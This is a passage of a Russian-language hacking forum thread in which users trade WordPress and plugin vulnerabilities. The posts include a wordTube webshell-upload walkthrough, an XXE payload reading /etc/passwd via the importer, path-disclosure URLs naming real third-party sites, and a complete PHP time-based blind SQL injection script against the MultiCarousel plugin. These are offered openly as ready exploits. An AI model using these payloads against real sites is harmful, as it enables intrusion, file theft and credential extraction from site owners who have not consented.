Старый 29.01.2012, 13:23   #41
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Цитата:
Сообщение от tch Посмотреть сообщение
Читал где-то про install.php,вот только не понял можноли поставить поверху или что другое?
нельзя, кстати недавно появилось advisory насчет install.php - https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt. "Уязвимость" в том, что при неустановленном wp, его можно установить в БД, контролируемую атакующим. Сразу видно, что писалось ради пиара, так как вряд ли кто-то оставит установку wp незавершенной, в общем уязвимость высосана из пальца.
Raz0r вне форума   Ответить с цитированием
Старый 07.02.2012, 18:49   #42
tch
 
Аватар для tch
 
Регистрация: 18.09.2011
Сообщений: 9
Репутация: 0
По умолчанию

Встречал такие сайты, с блогом. в подпапке =)!
tch вне форума   Ответить с цитированием
Старый 14.03.2012, 10:36   #43
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

плагин wordTube
заливка шела с правами редактора
заходим
/wp-admin/upload.php?page=wordTube
создаем новый медиа файл
в поле Select thumbnail расширение не проверяется
льем туда шел как есть, ничего не меняя
заходим в созданный медиафайл, и наблюдаем линк на шел
vp$ вне форума   Ответить с цитированием
Старый 16.03.2012, 15:37   #44
+toxa+
 
Аватар для +toxa+
 
Регистрация: 20.07.2010
Сообщений: 4
Репутация: 3
По умолчанию

Цитата:
Сообщение от recfrf Посмотреть сообщение
подскажите, есть сканеры установленных плагинов wp, существует что-то аналогичное только по установленным темам?
http://code.google.com/p/cms-explorer/
+toxa+ вне форума   Ответить с цитированием
Старый 28.05.2012, 14:25   #45
<cyber-punk>
 
Аватар для <cyber-punk>
 
Регистрация: 06.10.2011
Сообщений: 10
Репутация: 9
По умолчанию Уязвимость плагина Wordpress-importer

Уязвимость плагина Wordpress-importer

Привилегии: admin
Тип уязвимости: Читалка файлов
Автор: cyber-punk

wordpress-importer

Опишу все коротко, но ясно.
Для начала экспортируем хотя бы одну запись. Это делается тут:

Код:
http://127.0.0.1/wordpress/wp-admin/export.php
Дальше открываем этот файл и вставляем следующее:

PHP код:
<?xml version="1.0" encoding="UTF-8" ?>
 
<!DOCTYPE leak [
<!ELEMENT leak (#PCDATA)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
 
<rss version="2.0".......
Теперь в переменной xxe у нас будет содержание файла /etc/passwd.
Чтобы вывести этот параметр, мы можем вставить его куда угодно, например:

PHP код:
.....
<
content:encoded>&xxe;</content:encoded>
..... 


Вот у нас получился готовый эксплойт. Теперь импортируем его обратно тут -

Код:
http://127.0.0.1/wordpress/wp-admin/admin.php?import=wordpress
__________________
Blog - cyberpunkych
Twitter - @cyberpunkych
<cyber-punk> вне форума   Ответить с цитированием
Старый 19.12.2012, 07:56   #46
n3m1s
 
Регистрация: 13.11.2012
Сообщений: 10
Репутация: 0
По умолчанию

Wordpress 3.5 Full Path Disclosure

Exploit:

Код:
localhost/?cat[]=1
Result:

Код:
Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
Example:

Код:
_tpp://sergeybiryukov.ru/?cat[]=1
_ttp://wpsymposium.com/?cat[]=1
Found by n3m1s
n3m1s вне форума   Ответить с цитированием
Старый 17.03.2013, 21:22   #47
banana
 
Аватар для banana
 
Регистрация: 05.07.2010
Сообщений: 29
Репутация: 3
По умолчанию

Sociable-re Plugin FPD

Exploit: http://site/wp-content/plugins/sociable-re/sociable.php
Result: Fatal error: Call to undefined function plugin_basename() in *path*/wp-content/plugins/sociable-re/sociable.php on line 36
Example: xttp://lesbiru.com/wp-content/plugins/sociable-re/sociable.php
banana вне форума   Ответить с цитированием
Старый 08.07.2013, 15:06   #48
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Плагин MultiCarousel
Last Updated: 2012-8-6 version 2.0

Time-based sql injection
Vulnerable file: crslupdate.php

vulderability:

Код:
require_once('../../../wp-blog-header.php');
$actiontotake = $_POST['action'];

if($actiontotake=="update"){
$id = $_POST['id'];
$url =$_POST['url'];
$crslorder =$_POST['crslorder'];
global $wpdb;
$as_tejus_crsl_table_name_sec = $wpdb->prefix."as_tejus_crsl_sec";
$sql = "update ".$as_tejus_crsl_table_name_sec. " set url = '".$url."', crslorder = '".$crslorder."' where id = ".$id;
$wpdb->query($sql);

}
if($actiontotake=="delete"){
$id= $_POST['id'];
global $wpdb;
$as_tejus_crsl_table_name_sec = $wpdb->prefix."as_tejus_crsl_sec";
$query = "DELETE FROM ".$as_tejus_crsl_table_name_sec." WHERE id = ".$id;
$wpdb->query($query);
}
The snag is that $_POST array is escaped in wp-blog-header.php.
But still we have double-blind SQL injection:

Exploit:


id = (case when (select ord(substr(table_name,1,1)) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d 61 limit 1)='.ord($alpha).' then sleep(7) end)

PHP код:
<?php
$alphabet 
"\$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-\\\/.";

$prefix '';
for(
$i=1;$i<45;$i++){
    for(
$j=0;$j strlen($alphabet); $j++) {
        
$alpha $alphabet[$j];
        
$payload '(case when (select ord(substr(user_login,'.$i.',1)) from prefix_users limit 0,1)='.ord($alpha).' then sleep(7) end) -- 123';
        
$postdata http_build_query(
            array(
                
'action' => 'update',
                
'id' => $payload,
                
'url' => '1',
                
'crslorder' => '1'
            
)
        );
        
        
$opts = array('http' =>
            array(
                
'method'  => 'POST',
                
'header'  => "Content-type: application/x-www-form-urlencoded\r\n".
                                
"Content-Length: ".strlen($postdata),
                
'content' => $postdata
            
)
        );
                                
        
$context  stream_context_create($opts);
        
$url 'http://192.168.47.19/wp-content/plugins/multicarousel/crslupdate.php';
        
$time_one time(); 
        
$result = @file_get_contents($urlfalse$context);
        if (
time() - $time_one 4){
            
$prefix .= $alpha;
            echo 
$prefix."\n";
            break;
        }
    }
};

Последний раз редактировалось HeartLESS; 08.07.2013 в 15:10..
HeartLESS вне форума   Ответить с цитированием
Старый 12.09.2013, 10:57   #49
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

http://vagosec.org/2013/09/wordpress...ect-injection/
wp<3.6.1, mysql utf8 table
Пишет, что есть класс в каком-то популярном плагине, дающий rce.
SynQ вне форума   Ответить с цитированием
Старый 16.11.2013, 11:44   #50
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

Инъекция php кода через комментарии. Старые версии WP Super Cache и W3 Total Cache:
http://www.antonioherraizs.com/10/20...-in-wordpress/
SynQ вне форума   Ответить с цитированием
Ответ

Метки
auth bypass, уязвимости wordpress, wordpress, wordpress plugin vuln, wordpress vulnerabilities

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot